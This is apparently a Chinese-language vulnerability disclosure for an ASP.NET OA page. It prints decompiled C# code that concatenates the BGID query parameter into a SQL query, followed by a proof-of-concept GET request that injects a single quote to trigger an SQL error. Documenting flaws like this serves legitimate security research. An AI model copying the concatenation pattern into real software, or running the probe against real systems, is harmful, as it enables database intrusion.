OAGL_GZJH_OA_GZJH_BG_DOC.cs代码
cs
using System;
using System.Data;
using System.IO;
using System.Web.Profile;
using System.Web.SessionState;
using System.Web.UI.HtmlControls;
using System.Web.UI.WebControls;
using ASP;
using CwhASPNETBaseNew;
using QzJiaoWu.Web;
public class OAGL_GZJH_OA_GZJH_BG_DOC : PageBaseNew, IRequiresSessionState
{
protected HyperLink LB1;
protected HtmlForm Form1;
protected DefaultProfile Profile => (DefaultProfile)Context.Profile;
protected global_asax ApplicationInstance => (global_asax)Context.ApplicationInstance;
protected override void LoadPage(object sender, EventArgs e)
{
//IL_0001: Unknown result type (might be due to invalid IL or missing references)
//IL_000b: Expected O, but got Unknown
DAOP = new DataOperation();
string text = base.Request.QueryString["BGID"].Trim();
string text2 = base.Request.QueryString["SQLB"].Trim();
DataTable dataTable = DAOP.getDataTable("select * from OA_BG where BGID = '" + text + "'");
if (dataTable.Rows.Count > 0)
{
string text3 = "";
text3 = base.Server.MapPath("../../upload/OAGL/") + dataTable.Rows[0]["BGID"].ToString() + text2 + ".doc";
if (File.Exists(text3))
{
LB1.Text = dataTable.Rows[0]["BGBT"].ToString();
LB1.NavigateUrl = "../../upload/OAGL/" + dataTable.Rows[0]["BGID"].ToString() + text2 + ".doc";
}
else
{
LB1.Text = "没有相关附件下载";
}
}
else
{
LB1.Text = "没有相关附件下载";
}
}
}关键代码分析
参数BGID直接拼接sql语句造成sql注入漏洞
POC
cs
GET /OAGL/GZJH/OA_GZJH_BG_DOC.aspx?BGID='&SQLB= HTTP/1.1
Host:
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9单引号报错语法错误
